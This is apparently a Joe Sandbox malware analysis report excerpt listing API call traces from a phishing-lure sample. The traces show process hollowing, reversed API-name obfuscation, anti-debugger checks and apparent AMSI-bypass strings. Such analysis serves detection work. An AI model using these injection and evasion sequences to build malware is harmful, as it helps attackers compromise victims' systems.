                                                                                                      • Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                      • Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                      • Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    • SetThreadContext.KERNEL32(00000A74,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,00000A78,003E7FF8,02B814F8,00000004,02B814FC), ref: 02B3A14F
                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000A74,00000000,00000A74,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,00000A78,003E7FF8,02B814F8), ref: 02B3A15C
                                                                                                      • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                      • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                      • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                    • API String ID: 4083799063-51457883
                                                                                                    • Opcode ID: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
                                                                                                    • Instruction ID: a739fa68494b68729180e27db8bd6d6f415237a3fd8a7800f12e8c14729794c5
                                                                                                    • Opcode Fuzzy Hash: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
                                                                                                    • Instruction Fuzzy Hash: 3AE2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                      • Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                    • GetThreadContext.KERNEL32(00000A74,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A
                                                                                                      • Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                      • Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                      • Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                    • API String ID: 2852987580-51457883
                                                                                                    • Opcode ID: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
                                                                                                    • Instruction ID: 70296f05d11a88401721e9d019b62269f8676719c0b985bc7c43bd063f6bc056
                                                                                                    • Opcode Fuzzy Hash: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
                                                                                                    • Instruction Fuzzy Hash: F5E2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                                                    • RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                                                    • RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                    • Opcode ID: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                                                    • Instruction ID: 4bd932c78b7b0ae43d0d2699d52b0914be321c09d70b45ade323b729943c388b
                                                                                                    • Opcode Fuzzy Hash: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                                                    • Instruction Fuzzy Hash: 84515371A5032C7AFB25DAA88C46FEF77AD9B04744F8001E1B64CE6181E6749A488FA5

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                    • Opcode ID: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
                                                                                                    • Instruction ID: 8a5edc7cfb20edf46ff924efe6e7fdd27d4fd4135212d1152950f0671cfba796
                                                                                                    • Opcode Fuzzy Hash: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
                                                                                                    • Instruction Fuzzy Hash: 7CF0F671EA3324BEEB11AF6DAC44FB6379CE7823D4F0089AAB10C87540C7701826CB50

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                    • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                    • API String ID: 35162468-539270669
                                                                                                    • Opcode ID: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
                                                                                                    • Instruction ID: 36edf0b448852898b8c0320bd71328b9f441e0f2367a0802d6d2026963a73c7c
                                                                                                    • Opcode Fuzzy Hash: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
                                                                                                    • Instruction Fuzzy Hash: 39F0A03090425CAEEB13AAAC88887DCFBA99F09328FA407D6A424B21D1E7755694C651

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D
                                                                                                      • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    Similarity
                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1897104825-0
                                                                                                    • Opcode ID: 7004e8a4fad2d58994b2961b7bbf39b632903f382e0da6f180d1e9148abe172d
                                                                                                    • Instruction ID: 06edcd81b079114e43769282066cb6bac84a80f8c630645dead5d9726a2fcf3a
                                                                                                    • Opcode Fuzzy Hash: 7004e8a4fad2d58994b2961b7bbf39b632903f382e0da6f180d1e9148abe172d
                                                                                                    • Instruction Fuzzy Hash: 68210375A50319BEEB11EAE4CC46FEE77BDEB08700F5005A1B704F71C0DAB4AA048B95

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CheckConnectionInternet
                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                    • Opcode ID: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
                                                                                                    • Instruction ID: cb1ff9b933552fd49c799d69fa3e744fe6fb54d56ffe49df04c925ced8d9b85f
                                                                                                    • Opcode Fuzzy Hash: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
                                                                                                    • Instruction Fuzzy Hash: B8412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                    Similarity
                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3764614163-0
                                                                                                    • Opcode ID: 4ef21f81958f4e61dd8dd9669ba8b352768e9cc96ed288da8435ddb670ffaed3
                                                                                                    • Instruction ID: 905621b6259aaa7755e7909b5cc6afafbe30b01d1cc0859b74b1836ac1ea43bc
                                                                                                    • Opcode Fuzzy Hash: 4ef21f81958f4e61dd8dd9669ba8b352768e9cc96ed288da8435ddb670ffaed3
                                                                                                    • Instruction Fuzzy Hash: 9321FF71A40319BAEB11EAE4CD42FDEB7BDEB04B00F5045A1B604F75D0D7B06F048A65
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                    • String ID: CreateProcessAsUserW$Kernel32
                                                                                                    • API String ID: 3130163322-2353454454
                                                                                                    • Opcode ID: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
                                                                                                    • Instruction ID: 9cc3bc0a6e313e202488f56eaee7c66dd24cbaf687a8aaff39c4c67155a6f3d7
                                                                                                    • Opcode Fuzzy Hash: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
                                                                                                    • Instruction Fuzzy Hash: 8511D0B6650208BFEB41EEACDD81F9A37EDEB4C710F5144A0BA0CE7A40C634E9148B61
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                    • API String ID: 4072585319-445027087
                                                                                                    • Opcode ID: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
                                                                                                    • Instruction ID: 06255f0686641808faaa8339eed2742932e287a1922ef921a54ccb927c6d9abd
                                                                                                    • Opcode Fuzzy Hash: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
                                                                                                    • Instruction Fuzzy Hash: 47111E75650208BFEB01EFA4DC41E9EB7FDEB48710F5184A1F918E7A40DA30AA15DB61
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                    • API String ID: 4072585319-445027087
                                                                                                    • Opcode ID: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
                                                                                                    • Instruction ID: 640fc1c9fc663f496ea03b43a532041b52c29d3713c5d231b6f8012e4c4f273e
                                                                                                    • Opcode Fuzzy Hash: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
                                                                                                    • Instruction Fuzzy Hash: D5111B75650208BFEB01EFA4DC81E9EB7BDEB48710F5184A1F918E7A40DA30AA15DB61
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                    • API String ID: 2521977463-737317276
                                                                                                    • Opcode ID: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
                                                                                                    • Instruction ID: 424e101567ae36958a713661a9742a4210e6efadb78643fcd98ea09cb64af909
                                                                                                    • Opcode Fuzzy Hash: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
                                                                                                    • Instruction Fuzzy Hash: DC012979610208BFEB01EFA8DC41E9A77FEEB48710F5188A0F908D7A00DA34E915CF65
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                    • String ID: Ntdll$yromeMlautriVetirW
                                                                                                    • API String ID: 2719805696-3542721025
                                                                                                    • Opcode ID: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
                                                                                                    • Instruction ID: 5d068c67dd69075e3ea53939c5cb3fa0a28e5a343968b4cd35cc7ed2045faac5
                                                                                                    • Opcode Fuzzy Hash: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
                                                                                                    • Instruction Fuzzy Hash: C10129B5650208BFEB02EF98DC41EAAB7FDEB4D710F518490B508E7A90CA30A915DF61
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                    • API String ID: 3503870465-2520021413
                                                                                                    • Opcode ID: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
                                                                                                    • Instruction ID: 69fc646870e9092b993a3bdddb9d1549ecd64cb4deb4f9dfdd0ea1fbec644f1f
                                                                                                    • Opcode Fuzzy Hash: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
                                                                                                    • Instruction Fuzzy Hash: A4016275654304BFEB02EFA8DC41E5EB7BEEB49710F5288A0B40897A11DA34AA05CE21
                                                                                                    APIs
                                                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                    • NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
